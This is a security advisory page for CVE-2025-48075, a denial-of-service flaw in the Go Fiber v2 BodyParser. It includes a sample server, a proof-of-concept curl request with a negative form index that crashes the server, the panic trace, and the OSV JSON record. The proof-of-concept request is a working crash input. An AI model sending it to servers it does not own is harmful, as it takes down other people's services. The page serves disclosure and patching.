ghsa-hg3g-gphw-5hhm
Vulnerability from github
Published
2025-05-22 20:08
Modified
2025-05-28 19:46
Severity ?
7.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P
Summary
Fiber panics when fiber.Ctx.BodyParser parses invalid range index
Details

Summary

When using the fiber.Ctx.BodyParser to parse into a struct with range values, a panic occurs when trying to parse a negative range index

Details

fiber.Ctx.BodyParser can map flat data to nested slices using key[idx]value syntax, however when idx is negative, it causes a panic instead of returning an error stating it cannot process the data.

Since this data is user-provided, this could lead to denial of service for anyone relying on this fiber.Ctx.BodyParser functionality

Reproducing

Take a simple GoFiberV2 server which returns a JSON encoded version of the FormData ```go package main

import ( "encoding/json" "fmt" "net/http"

"github.com/gofiber/fiber/v2"

)

type RequestBody struct { NestedContent []*struct { Value string form:"value" } form:"nested-content" }

func main() { app := fiber.New()

app.Post("/", func(c *fiber.Ctx) error {
    formData := RequestBody{}
    if err := c.BodyParser(&formData); err != nil {
        fmt.Println(err)
        return c.SendStatus(http.StatusUnprocessableEntity)
    }
            c.Set("Content-Type", "application/json")
            s, _ := json.Marshal(formData)
            return c.SendString(string(s))
})

fmt.Println(app.Listen(":3000"))

}

```

Correct Behaviour Send a valid request such as: bash curl --location 'localhost:3000' \ --form 'nested-content[0].value="Foo"' \ --form 'nested-content[1].value="Bar"' You recieve valid JSON json {"NestedContent":[{"Value":"Foo"},{"Value":"Bar"}]}

Crashing behaviour Send an invalid request such as: bash curl --location 'localhost:3000' \ --form 'nested-content[-1].value="Foo"' The server panics and crashes ``` panic: reflect: slice index out of range

goroutine 8 [running]: reflect.Value.Index({0x738000?, 0xc000010858?, 0x0?}, 0x738000?) /usr/lib/go-1.24/src/reflect/value.go:1418 +0x167 github.com/gofiber/fiber/v2/internal/schema.(*Decoder).decode(0xc00002c570, {0x75d420?, 0xc000010858?, 0x7ff424822108?}, {0xc00001c498, 0x17}, {0xc00014e2d0, 0x2, 0x2}, {0xc00002c710, ...}) [...] ```

Impact

Anyone using fiber.Ctx.BodyParser can/will have their servers crashed when an invalid payload is sent

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gofiber/fiber/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.52.6"
            },
            {
              "fixed": "2.52.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48075"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-129"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-22T20:08:31Z",
    "nvd_published_at": "2025-05-22T18:15:43Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nWhen using the `fiber.Ctx.BodyParser` to parse into a struct with range values, a panic occurs when trying to parse a negative range index\n\n### Details\n`fiber.Ctx.BodyParser` can map flat data to nested slices using `key[idx]value` syntax, however when idx is negative, it causes a panic instead of returning an error stating it cannot process the data. \n\nSince this data is user-provided, this could lead to denial of service for anyone relying on this `fiber.Ctx.BodyParser`  functionality  \n\n### Reproducing\nTake a simple GoFiberV2 server which returns a JSON encoded version of the FormData\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/gofiber/fiber/v2\"\n)\n\ntype RequestBody struct {\n\tNestedContent []*struct {\n\t\tValue string `form:\"value\"`\n\t} `form:\"nested-content\"`\n}\n\nfunc main() {\n\tapp := fiber.New()\n\n\tapp.Post(\"/\", func(c *fiber.Ctx) error {\n\t\tformData := RequestBody{}\n\t\tif err := c.BodyParser(\u0026formData); err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn c.SendStatus(http.StatusUnprocessableEntity)\n\t\t}\n                c.Set(\"Content-Type\", \"application/json\")\n                s, _ := json.Marshal(formData)\n                return c.SendString(string(s))\n\t})\n\n\tfmt.Println(app.Listen(\":3000\"))\n}\n\n```\n\n**Correct Behaviour**\nSend a valid request such as:\n```bash\ncurl --location \u0027localhost:3000\u0027 \\\n--form \u0027nested-content[0].value=\"Foo\"\u0027 \\\n--form \u0027nested-content[1].value=\"Bar\"\u0027\n```\nYou recieve valid JSON\n```json\n{\"NestedContent\":[{\"Value\":\"Foo\"},{\"Value\":\"Bar\"}]}\n```\n\n**Crashing behaviour**\nSend an invalid request such as:\n```bash\ncurl --location \u0027localhost:3000\u0027 \\\n--form \u0027nested-content[-1].value=\"Foo\"\u0027\n```\nThe server panics and crashes\n```\npanic: reflect: slice index out of range\n\ngoroutine 8 [running]:\nreflect.Value.Index({0x738000?, 0xc000010858?, 0x0?}, 0x738000?)\n        /usr/lib/go-1.24/src/reflect/value.go:1418 +0x167\ngithub.com/gofiber/fiber/v2/internal/schema.(*Decoder).decode(0xc00002c570, {0x75d420?, 0xc000010858?, 0x7ff424822108?}, {0xc00001c498, 0x17}, {0xc00014e2d0, 0x2, 0x2}, {0xc00002c710, ...})\n[...]\n```\n\n### Impact\nAnyone using `fiber.Ctx.BodyParser` can/will have their servers crashed when an invalid payload is sent",
  "id": "GHSA-hg3g-gphw-5hhm",
  "modified": "2025-05-28T19:46:57Z",
  "published": "2025-05-22T20:08:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gofiber/fiber/security/advisories/GHSA-hg3g-gphw-5hhm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48075"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gofiber/fiber/commit/e115c08b8f059a4a031b492aa9eef0712411853d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gofiber/fiber"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3706"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Fiber panics when fiber.Ctx.BodyParser parses invalid range index"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.